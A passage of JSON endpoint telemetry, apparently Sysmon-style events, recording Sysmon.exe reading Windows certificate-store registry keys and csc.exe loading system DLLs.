"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": 
"CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859020000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 